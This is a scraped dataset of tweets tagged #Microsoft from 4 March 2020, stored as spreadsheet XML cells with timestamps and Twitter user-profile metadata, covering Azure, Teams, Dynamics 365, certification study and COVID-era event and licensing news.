    <t>{'id': 217525507, 'id_str': '217525507', 'name': 'LouMUG', 'screen_name': 'LouMUG', 'location': 'Louisville KY', 'description': 'A forum for computer professionals in the Louisville area interested in gaining &amp; sharing knowledge in Microsoft technologies through networking &amp; education.', 'url': 'http://t.co/06d3122pGv', 'entities': {'url': {'urls': [{'url': 'http://t.co/06d3122pGv', 'expanded_url': 'http://www.loumug.org', 'display_url': 'loumug.org', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 233, 'friends_count': 166, 'listed_count': 13, 'created_at': 'Fri Nov 19 19:32:26 +0000 2010', 'favourites_count': 420, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 867,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'http://pbs.twimg.com/profile_images/581452640157995008/hETGfXCA_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/581452640157995008/hETGfXCA_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/217525507/1581607279',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</si>
  <si>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13:41:03 +0000 2020</t>
  </si>
  <si>
    <t>100 ways to use #Microsoft #Yammer https://t.co/4qI7omJeNe https://t.co/oMkUs4z7Wc</t>
  </si>
  <si>
    <t>Wed Mar 04 13:37:26 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Philippines' Andres Ortola talking to ANC about AI and digital transformation in Asia Pacific markets such as the Philippines https://t.co/xKLjpjhuM0</t>
  </si>
  <si>
    <t>{'id': 216723713, 'id_str': '216723713', 'name': 'Eah Antonio', 'screen_name': 'eah_antonio', 'location': 'Philippines', 'description': 'media producer. advocate. sustainable development. well being. ðŸ¦‹ðŸ€', 'url': 'https://t.co/bsOqUfmLx7', 'entities': {'url': {'urls': [{'url': 'https://t.co/bsOqUfmLx7', 'expanded_url': 'http://www.eahantonio.com/', 'display_url': 'eahantonio.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 223, 'friends_count': 661, 'listed_count': 4, 'created_at': 'Wed Nov 17 14:55:57 +0000 2010', 'favourites_count': 763, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1171, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': 'FFF04D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme19/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1094385175973158912/KiJBIr7X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1094385175973158912/KiJBIr7X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/216723713/1562481847', 'profile_link_color': 'FF691F',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</si>
  <si>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Wed Mar 04 13:35:52 +0000 2020</t>
  </si>
  <si>
    <t>AZ-204 Study Guide: Developing Solutions for #Microsoft #Azure
@ThomasMaurer
https://t.co/zB89TVXCoh</t>
  </si>
  <si>
    <t>{'id': 843789242073595906, 'id_str': '843789242073595906', 'name': 'Elena Redka', 'screen_name': 'RedkaElena', 'location': 'USA', 'description': 'Virtualization Engineer  at @starwindsan Interested in  #Virtualization #vSphere #Servers #StarWind #Traveling', 'url': 'https://t.co/t5tzfurUNv', 'entities': {'url': {'urls': [{'url': 'https://t.co/t5tzfurUNv', 'expanded_url': 'http://starwind.com', 'display_url': 'starwind.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7644, 'friends_count': 6800, 'listed_count': 42, 'created_at': 'Mon Mar 20 11:40:06 +0000 2017', 'favourites_count': 1412, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2251,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'http://pbs.twimg.com/profile_images/843820050763173889/6WNjTxKb_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/843820050763173889/6WNjTxKb_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/843789242073595906/1506345598',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</si>
  <si>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13:35:51 +0000 2020</t>
  </si>
  <si>
    <t>Thinking about creating a YouTube channel to provide free training on diffrent cloud computing products such as @salesforce, @amazon, and @mircosoft Azure. Thoughts?
#aws #salesforce #microsoft #azure #cloud #cloudcomputing #militarytransition</t>
  </si>
  <si>
    <t>{'id': 1226878117291134976, 'id_str': '1226878117291134976', 'name': 'Patrick Istefanidis', 'screen_name': 'PIstefanidis', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 70, 'listed_count': 0, 'created_at': 'Mon Feb 10 14:38:44 +0000 2020', 'favourites_count': 39, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1234980671694700544/KF7cq5mh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234980671694700544/KF7cq5mh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1226878117291134976/1583277365',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</si>
  <si>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13:31:43 +0000 2020</t>
  </si>
  <si>
    <t>Several #Microsoft event websites now have statements about the coronavirus and could be canceled, but for now, Microsoft is "monitoring public health guidance." https://t.co/is7vVaeCQv</t>
  </si>
  <si>
    <t>Wed Mar 04 13:30:51 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: #Cisco is offering free 90-day #Webex licenses to businesses who are not Webex customers as concerns over #COVID19 continue to rise. #Microsoft has also followed suit with Teams.
https://t.co/2mMBqOAaSX
#CDNTech</t>
  </si>
  <si>
    <t>Wed Mar 04 13:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Increasingly, the C in #CFO will stand for #climate ... #Microsoft #Sustainability @MichelVdBel #CarbonNegative https://t.co/bpH1d0ZPkP #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Mar 04 13:23:20 +0000 2020</t>
  </si>
  <si>
    <t>How do I study for AWS Solution Architect?
Know More;
https://t.co/WwIVc9rOnn
#aws,#cloudcomputing,#devops,#azure,#amazon,#amazonwebservices,#database,#innovation,#bigdata,#cloud,#datascience,#developer,#FelizMiercoles,#microsoft,#technology,#RiggedPrimary,#WednesdayMotivation https://t.co/Et9eCIG3Ji</t>
  </si>
  <si>
    <t>{'id': 1054710554055430144, 'id_str': '1054710554055430144', 'name': 'Lauren Smith', 'screen_name': 'LaurenSmithHr', 'location': 'Houston, TX', 'description': 'AWS Azure Google cloud Courses Training &amp; Corporate Training at  CLOUD Chalk-Talk for #AmazonWebServices #Cloud #job  &amp; #aws #devops #awssolutionarchitect', 'url': 'https://t.co/d5U4xpsaqp', 'entities': {'url': {'urls': [{'url': 'https://t.co/d5U4xpsaqp', 'expanded_url': 'https://cloud-chalktalk.com', 'display_url': 'cloud-chalktalk.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 515, 'friends_count': 1523, 'listed_count': 3, 'created_at': 'Tue Oct 23 12:26:06 +0000 2018', 'favourites_count': 157, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 260, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1214788791069593600/_BPBulQh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214788791069593600/_BPBulQh_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1054710554055430144/1570626768',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</si>
  <si>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13:21:07 +0000 2020</t>
  </si>
  <si>
    <t>We are very proud to have established an enhanced collaborative partnership with Microsoft by achieving its prestigious Gold status.
https://t.co/V6ZvsHi0ek
#engineering #im #data #consultancy #oilandgasindustry #microsoft #microsoftgold #software #digital #datamanagement https://t.co/fS2UciUSzE</t>
  </si>
  <si>
    <t>{'id': 595431787, 'id_str': '595431787', 'name': 'Phusion IM', 'screen_name': 'phusionim', 'location': 'Billingham, UK', 'description': 'Phusion creates a coherent single source of truth for engineering information, using their own innovative and powerful range of SaaS apps and consultation.', 'url': 'http://t.co/FU8hNi6qrA', 'entities': {'url': {'urls': [{'url': 'http://t.co/FU8hNi6qrA', 'expanded_url': 'http://www.phusionim.com', 'display_url': 'phusionim.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 278, 'friends_count': 272, 'listed_count': 26, 'created_at': 'Thu May 31 12:04:01 +0000 2012', 'favourites_count': 228, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 632,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'http://pbs.twimg.com/profile_images/3736521965/7fc83b45910b2247b7bc8e2c349ad40f_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3736521965/7fc83b45910b2247b7bc8e2c349ad40f_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/595431787/1528817602', 'profile_link_color': '3BA4DC',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</si>
  <si>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13:20:05 +0000 2020</t>
  </si>
  <si>
    <t>How Security Leaders at #Starbucks and #Microsoft Prepare for Breaches https://t.co/NPmRcxafKU #databreach #cybersecurity https://t.co/dZLlnTTKiz</t>
  </si>
  <si>
    <t>Wed Mar 04 13:20:01 +0000 2020</t>
  </si>
  <si>
    <t>Looking to adopt or renew one of #Microsoft's key offerings? Dont worry, there is still hope in achieving a best-in-class deal with these negotiation tips @Adam_Mansfield_ #Office365 #Cloud #Dynamics365 #Azure https://t.co/KoAr33OGQJ</t>
  </si>
  <si>
    <t>Wed Mar 04 13:17:39 +0000 2020</t>
  </si>
  <si>
    <t>Day 59/366. 2002/11/11.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #PlatinumHits #Mechassault #MicrosoftGameStudios @ Greensboro, North Carolina https://t.co/SZoFV6pMJ2</t>
  </si>
  <si>
    <t>Wed Mar 04 13:15:38 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/wFDGHlzrAr</t>
  </si>
  <si>
    <t>{'id': 135558137, 'id_str': '135558137', 'name': 'The Data Pros', 'screen_name': 'TheDataPros', 'location': 'NJ, NY', 'description': 'IT Consulting &amp; Outsourcing firm focused on Managed Services and Cloud Computing for Small &amp; Mid-market companies. Microsoft Partner &amp; US Cloud Champion.', 'url': 'https://t.co/qYPklVnpyR', 'entities': {'url': {'urls': [{'url': 'https://t.co/qYPklVnpyR', 'expanded_url': 'http://www.the-data-pros.net/', 'display_url': 'the-data-pros.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1454, 'friends_count': 2921, 'listed_count': 151, 'created_at': 'Wed Apr 21 16:52:56 +0000 2010', 'favourites_count': 446, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5289, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '9DBCD9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme16/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/608310706010619904/hkoADkjS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/608310706010619904/hkoADkjS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/135558137/1545148988', 'profile_link_color': '005EFF', 'profile_sidebar_border_color': '59C2FF', 'profile_sidebar_fill_color': '0857A1', 'profile_text_color': 'D6D6D6', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:14:27 +0000 2020</t>
  </si>
  <si>
    <t>Tired of being chained to your desk? Want to brush up on your digital skills? Check out this article to learn how you can #workremotely with help from #communication apps and tools. What are you waiting for? Get #Teamworksolutions from #Microsoft. https://t.co/rrwsR1rYWo</t>
  </si>
  <si>
    <t>{'id': 46993935, 'id_str': '46993935', 'name': '37SOLUTIONS', 'screen_name': '37solutions', 'location': 'Pittsburgh, Pennsylvania, USA', 'description': 'Managed Website and Email #Hosting | Website Design and Maintenance with Concierge Service | #SEO, #SEM, #SMM', 'url': 'https://t.co/R3TSdmcNHx', 'entities': {'url': {'urls': [{'url': 'https://t.co/R3TSdmcNHx', 'expanded_url': 'https://www.37solutions.com', 'display_url': '37solutions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1022, 'friends_count': 2083, 'listed_count': 138, 'created_at': 'Sun Jun 14 00:18:14 +0000 2009', 'favourites_count': 232, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2099,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'http://pbs.twimg.com/profile_images/461004757021097984/dLbj1kBo_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/461004757021097984/dLbj1kBo_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/46993935/1398747248',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</si>
  <si>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Mar 04 13:13:14 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft have a handy website to help you identify whether you have the right licensing for your software.
In fact, it's not that handy at all. So if you're unsure then give us a call or drop us a message and we can help you.
https://t.co/n4PFuGd27u
#licensing #microsoft</t>
  </si>
  <si>
    <t>{'id': 137279812, 'id_str': '137279812', 'name': 'Cultrix', 'screen_name': 'Cultrix', 'location': 'Barnsley - UK', 'description': 'IT support, #Cloud #computing and IT services for business, voluntary and community sector and resellers. White label experts. ITexperts@cultrix.co.uk', 'url': 'https://t.co/sPuMICHke9', 'entities': {'url': {'urls': [{'url': 'https://t.co/sPuMICHke9', 'expanded_url': 'http://www.cultrix.co.uk', 'display_url': 'cultrix.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1357, 'friends_count': 907, 'listed_count': 38, 'created_at': 'Mon Apr 26 09:37:57 +0000 2010', 'favourites_count': 339, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2741,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'http://pbs.twimg.com/profile_images/435795470539964416/tXvWbJ8C_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/435795470539964416/tXvWbJ8C_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/137279812/1518044176', 'profile_link_color': '7BC142', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '555555', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:12:50 +0000 2020</t>
  </si>
  <si>
    <t>Continuation on how to improve our day to day #activities, #communication, and #creativity with the use of Teams.
#MITA #Microsoft #Teams https://t.co/NcZbb70T64</t>
  </si>
  <si>
    <t>{'id': 702506482357706752, 'id_str': '702506482357706752', 'name': 'MITA', 'screen_name': 'MITAmalta', 'location': 'Malta', 'description': 'The central driver of Governmentâ€™s #ICT policy, programmes and initiatives in #Malta.', 'url': 'https://t.co/s25IrXSxyH', 'entities': {'url': {'urls': [{'url': 'https://t.co/s25IrXSxyH', 'expanded_url': 'http://www.mita.gov.mt', 'display_url': 'mita.gov.mt', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 633, 'friends_count': 243, 'listed_count': 36, 'created_at': 'Wed Feb 24 14:52:52 +0000 2016', 'favourites_count': 133, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1257,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'http://pbs.twimg.com/profile_images/1190169217053671424/H1EvzivO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1190169217053671424/H1EvzivO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/702506482357706752/1456327056',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</si>
  <si>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13:12:00 +0000 2020</t>
  </si>
  <si>
    <t>#HPE solutions for #Microsoft #AzureStack portfolio: a complete set of integrated &amp;amp; certified solutions from #AzurestackHub to #AzurestackHCI presented by Alexandra Mira da Silva Tomorrow : Register at https://t.co/AsFDKgHeqt 
@p3dromorais @AcrmSilva @PTMicrosoft @B_Hallmans https://t.co/Rhww8wbVSL</t>
  </si>
  <si>
    <t>Wed Mar 04 13:09:02 +0000 2020</t>
  </si>
  <si>
    <t>View the recording of our Migrating to WVD: Look no file shares! webinar with @Liquidware solutions architect @GeorgeWSwain and #Microsoft #WVD Global Black Belt @JimMoyle https://t.co/qiN1dJI1An #BetterTogether https://t.co/lI3MabrxMF</t>
  </si>
  <si>
    <t>{'id': 19586949, 'id_str': '19586949', 'name': 'Morteza Esteki', 'screen_name': 'Mortezae', 'location': 'Amsterdam, Netherlands', 'description': 'Transforming the Desktop.', 'url': 'https://t.co/ybQgPuvwDr', 'entities': {'url': {'urls': [{'url': 'https://t.co/ybQgPuvwDr', 'expanded_url': 'http://www.liquidware.com', 'display_url': 'liquidware.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 438, 'listed_count': 6, 'created_at': 'Tue Jan 27 11:14:15 +0000 2009', 'favourites_count': 1797, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1353,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'http://pbs.twimg.com/profile_images/1225362150207692801/MF9_xI2Z_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225362150207692801/MF9_xI2Z_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19586949/1571223702', 'profile_link_color': '085878',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</si>
  <si>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Wed Mar 04 13:08:38 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Stigma Technologies. https://t.co/EpMxDtxRRY</t>
  </si>
  <si>
    <t>{'id': 920017251633434624, 'id_str': '920017251633434624', 'name': 'StigmaTechnologie', 'screen_name': 'StigmaTechno', 'location': 'MontrÃ©al, QuÃ©bec', 'description': 'Stigma Technologie, entreprise de sous-traitance informatique Ã  MontrÃ©al, Laval et Longueuil .', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 5, 'listed_count': 0, 'created_at': 'Mon Oct 16 20:03:00 +0000 2017', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 406, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/921021027554963456/AVRYDp1X_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/921021027554963456/AVRYDp1X_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920017251633434624/1508423464',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</si>
  <si>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13:08:30 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/4Pqak8t1Ot</t>
  </si>
  <si>
    <t>Wed Mar 04 13:08:17 +0000 2020</t>
  </si>
  <si>
    <t>Make integrating your #Microsoft processes a matter of point-and-click and allow #IT to pass #data and manage dependencies across applications, #databases, and disparate technologies. https://t.co/TZY2MkZWdx https://t.co/mt5ajquAnH</t>
  </si>
  <si>
    <t>Wed Mar 04 13:08:10 +0000 2020</t>
  </si>
  <si>
    <t>Update : EASY for Dynamics 365 BC is the new interface for seamless connection to EASY document management in the leading ERP Microsoft Dynamics 365 Business Central (NAV).   
https://t.co/rNlzW5zwiD
#EASYSOFTWARE #microsoft #dynamics #ERP #documentmanagement #archiving #365BC https://t.co/5PV5Hggsnj</t>
  </si>
  <si>
    <t>{'id': 115653229, 'id_str': '115653229', 'name': 'EASY SOFTWARE', 'screen_name': 'easy_software', 'location': 'MÃ¼lheim', 'description': 'From #Archive, #DMS and #ECM to #CloudPlatform, #SaaS and #PaaS. #Digitization of business processes. #EASYSOFTWARE #ApiOmat Imprint: https://t.co/ue7GaeIe44', 'url': 'https://t.co/ShoDuDJSVl', 'entities': {'url': {'urls': [{'url': 'https://t.co/ShoDuDJSVl', 'expanded_url': 'http://www.easy-software.com', 'display_url': 'easy-software.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ue7GaeIe44', 'expanded_url': 'https://easy-software.com/', 'display_url': 'easy-software.com', 'indices': [134, 157]}]}}, 'protected': False, 'followers_count': 3168, 'friends_count': 204, 'listed_count': 20, 'created_at': 'Fri Feb 19 12:38:35 +0000 2010', 'favourites_count': 440, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1908,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'http://pbs.twimg.com/profile_images/1045302295678930945/0Av5vBla_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045302295678930945/0Av5vBla_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/115653229/1551103756', 'profile_link_color': '009DE0',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</si>
  <si>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13:07:49 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/03425yri2d</t>
  </si>
  <si>
    <t>{'id': 22159478, 'id_str': '22159478', 'name': 'Andrew Brauda', 'screen_name': 'ambrauda', 'location': 'GA', 'description': '', 'url': 'https://t.co/N9HL0rX3Md', 'entities': {'url': {'urls': [{'url': 'https://t.co/N9HL0rX3Md', 'expanded_url': 'http://www.trinitynetworkconsulting.com', 'display_url': 'trinitynetworkconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 130, 'friends_count': 627, 'listed_count': 4, 'created_at': 'Fri Feb 27 16:49:52 +0000 2009', 'favourites_count': 226, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2146,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'http://pbs.twimg.com/profile_images/834852201193435141/4o_EUzLi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/834852201193435141/4o_EUzLi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22159478/1487879251',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</si>
  <si>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Wed Mar 04 13:07:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft launches new theme for Android users, will be able to use the phone in landscape #Microsoft #Theme #SevenSenseTech https://t.co/hkB911lqD9 https://t.co/uJHkUyZoaJ</t>
  </si>
  <si>
    <t>{'id': 763328493719543812, 'id_str': '763328493719543812', 'name': 'Seven Sense Tech', 'screen_name': 'SevenSenseTech', 'location': 'Noida, India', 'description': 'We are the brand management company in Delhi NCR.', 'url': 'https://t.co/YNzjOqDuOv', 'entities': {'url': {'urls': [{'url': 'https://t.co/YNzjOqDuOv', 'expanded_url': 'http://www.sevensense.in', 'display_url': 'sevensense.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 59, 'friends_count': 197, 'listed_count': 21, 'created_at': 'Wed Aug 10 10:57:49 +0000 2016', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2363,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'http://pbs.twimg.com/profile_images/1095035684178427905/EqNLpuZJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1095035684178427905/EqNLpuZJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/763328493719543812/1544815625',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</si>
  <si>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13:07:24 +0000 2020</t>
  </si>
  <si>
    <t>Always good (and important) to know: Limits and specifications for #Microsoft #Teams  https://t.co/8KO1MKxbS2</t>
  </si>
  <si>
    <t>{'id': 21620774, 'id_str': '21620774', 'name': 'Dieter Rauscher', 'screen_name': 'Dieter_Rauscher', 'location': 'âœˆï¸â˜ï¸', 'description': 'IT and Travel geek * Microsoft MVP 2002-2018 * book author * Azure Technical Trainer @Microsoft * Tweeting in EN+DE * views are my own', 'url': 'https://t.co/Mw1V0UvM0z', 'entities': {'url': {'urls': [{'url': 'https://t.co/Mw1V0UvM0z', 'expanded_url': 'http://about.me/Dieter', 'display_url': 'about.me/Dieter', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1122, 'friends_count': 620, 'listed_count': 139, 'created_at': 'Mon Feb 23 01:42:22 +0000 2009', 'favourites_count': 2392, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15855, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '0F0F0F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme7/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/991637630831022081/B2sSJ42d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991637630831022081/B2sSJ42d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/21620774/1531192670', 'profile_link_color': '990000', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:07:23 +0000 2020</t>
  </si>
  <si>
    <t>How many of the 5 habits do you practice?     When it comes to tools for #sales success, #Microsoft #Dynamics365 offers insights and recommendations. Learn more from Compuville Systems. https://t.co/Cy9TG1zLO4</t>
  </si>
  <si>
    <t>{'id': 27592066, 'id_str': '27592066', 'name': 'Compuville Systems', 'screen_name': 'compuville', 'location': 'L6M3E3 Oakville Ontario', 'description': 'Your Trusted IT Solution and Service Provider.', 'url': 'https://t.co/owYOGPSKKO', 'entities': {'url': {'urls': [{'url': 'https://t.co/owYOGPSKKO', 'expanded_url': 'http://www.compuville.ca', 'display_url': 'compuville.ca', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 122, 'friends_count': 82, 'listed_count': 3, 'created_at': 'Mon Mar 30 05:38:14 +0000 2009', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2156, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '41A9CC', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/537019975832457216/ZoAxAQjx_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/537019975832457216/ZoAxAQjx_normal.jpeg', 'profile_link_color': '00678A', 'profile_sidebar_border_color': '00678A', 'profile_sidebar_fill_color': '41A9CC', 'profile_text_color': '00678A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Mar 04 13:06:50 +0000 2020</t>
  </si>
  <si>
    <t>Make life easier for your teachers with these simple, time-saving #Windows10 shortcuts.      #EducationalTechnology #K12 #MicrosoftEducation #Microsoft https://t.co/pKDTgEEVry</t>
  </si>
  <si>
    <t>{'id': 4840250553, 'id_str': '4840250553', 'name': 'BayouCitySol', 'screen_name': 'bayoucitysol', 'location': '', 'description': 'Consultancy/Integration/VAR/Solution Provider - https://t.co/ZmpkieLtmz', 'url': 'https://t.co/p0rmaVAQUJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/p0rmaVAQUJ', 'expanded_url': 'http://www.bayoucitysolutionsllc.com', 'display_url': 'bayoucitysolutionsllc.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ZmpkieLtmz', 'expanded_url': 'https://bayoucitysolutionsllc.com/about-us.html', 'display_url': 'bayoucitysolutionsllc.com/about-us.html', 'indices': [48, 71]}]}}, 'protected': False, 'followers_count': 43, 'friends_count': 191, 'listed_count': 11, 'created_at': 'Sun Jan 24 00:24:06 +0000 2016', 'favourites_count': 51, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3202, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1023202645631070208/82B2aBA7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1023202645631070208/82B2aBA7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4840250553/1453595836',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</si>
  <si>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13:06:46 +0000 2020</t>
  </si>
  <si>
    <t>Anyone here who got this working with a regular laptop? #Microsoft #DisplayDock #HD500 #Lumia #Continuum #ItNeedsASecondLife #dock https://t.co/RDdPF677tG</t>
  </si>
  <si>
